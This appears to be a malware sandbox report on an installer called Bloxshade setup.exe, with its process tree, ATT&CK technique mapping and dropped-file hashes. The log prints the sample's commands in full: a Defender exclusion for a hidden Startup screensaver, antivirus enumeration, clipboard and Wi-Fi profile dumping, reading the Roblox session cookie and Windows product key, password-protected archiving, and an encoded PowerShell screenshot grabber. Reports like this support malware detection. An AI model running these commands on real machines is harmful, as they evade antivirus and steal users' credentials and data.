        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1716,6903082480245024986,4041687298655312318,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msPdfOOUI,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSmartScreenProtection,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch,msWebOOUI --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\com.bloxshade.tauri\EBWebView" --webview-exe-name=setup.exe --webview-exe-version=2.8.11 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2892 /prefetch:1
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ ‌‏‏.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ ‌‏‏.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2276
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1240
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4752
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4740
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3896
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2088
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\32gvy2z2\32gvy2z2.cmdline"
        5⤵
        
        PID:4672
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC87.tmp" "c:\Users\Admin\AppData\Local\Temp\32gvy2z2\CSCD95D2D63CE664A2D853827FB8710D03D.TMP"
        6⤵
        
        PID:2708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1508
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1236
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3136
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1488
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3796
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2400
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4596
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI38642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\QirAL.zip" *"
    3⤵
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\_MEI38642\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI38642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\QirAL.zip" *
      4⤵
      Executes dropped EXE
      PID:1640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4368
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:5072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1828

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4612

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3136

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Share Discovery

T1135

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Bloxshade\setup.exe

Filesize
6.6MB

MD5
32aed8eba58209c27bbe51b5ddd10894

SHA1
37c248f55117195c700788a52fdd6acddfaeb3c8

SHA256
343c8f7d74ddbbd2d8c62d991128ce076d56c663b175e7b307b2f6e04c26814b

SHA512
c88541952bd2ce3b39359d892b45b845c2092e469ad1087d038598563ec359794407625b9955b9d2092c988b76e82e9a42812d43fee0cc14c6d432b0497d7f34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
74e4a39ae145a98de20041613220dfed

SHA1
ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

SHA256
2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

SHA512
96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c997396ab03e6e961d61a75776920625

SHA1
2b63ce5be5b8b76801e0d62cb51b2c87e1e965fd

SHA256
d2f93cf7a2a3a90cb217b5a767866b8322c05504afdef7f8ec0d924d652cb57e

SHA512
45ffa340445886473a68e9427b255b70d1c0c1803b40c9449424a6203381109dcaa9cae3afb335bfaf6e57cf1aa104e287807ec20e1ba2e50ed61aeaec24606f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
45f53352160cf0903c729c35c8edfdce

SHA1
b35a4d4fbaf2a3cc61e540fc03516dd70f3c34ab

SHA256
9cf18d157a858fc143a6de5c2dd3f618516a527b34478ac478d8c94ff027b0d2

SHA512
e3fa27a80a1df58acb49106c306dab22e5ed582f6b0cd7d9c3ef0a85e9f5919333257e88aa44f42a0e095fd577c9e12a02957a7845c0d109f821f32d8d3343f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6903d57eed54e89b68ebb957928d1b99

SHA1
fade011fbf2e4bc044d41e380cf70bd6a9f73212

SHA256
36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52

SHA512
c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
7d760ca2472bcb9fe9310090d91318ce

SHA1
cb316b8560b38ea16a17626e685d5a501cd31c4a

SHA256
5c362b53c4a4578d8b57c51e1eac15f7f3b2447e43e0dad5102ecd003d5b41d4

SHA512
141e8661d7348ebbc1f74f828df956a0c6e4cdb70f3b9d52623c9a30993bfd91da9ed7d8d284b84f173d3e6f47c876fb4a8295110895f44d97fd6cc4c5659c35

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a873c13ffa169a1e672aa991ca72aeb3

SHA1
0e1e8e91738e70980ca646b91de79bb2dd0c7763

SHA256
bec3e737e684740ff59eb220c95d1cad5ba00ec305066bdb86665edbf0bdb2f5

SHA512
49d0cbedd336ae1438b43b0717b46df2af25936b5ac4a95abda02c47f7391301fe0c4d365e0e313434124d31924909db79ccad00b528210bdcc89ee96c6d9b3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\32gvy2z2\32gvy2z2.dll

Filesize
4KB

MD5
acd89eae51475e44f92c6c5f477274ad

SHA1
6604bf6f25926a567f4e08bc28e18b89bcaac3c5

SHA256
56c31b5413e6273f94afe0774895926fd2e4f080d1d4ba118ae6c6f068158a90

SHA512
1d1041c5c251c9d786d214e5d749a6dc4ff00ee626ebbb9ae58c61d9f6d628013d42332372ee72b0916e45bb79a85117cf83a757c13321580bd7b43a5e7fb8a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\PQPIfKRxcF.tmp

Filesize
116KB

MD5
4e2922249bf476fb3067795f2fa5e794

SHA1
d2db6b2759d9e650ae031eb62247d457ccaa57d2

SHA256
c2c17166e7468877d1e80822f8a5f35a7700ac0b68f3b369a1f4154ae4f811e1

SHA512
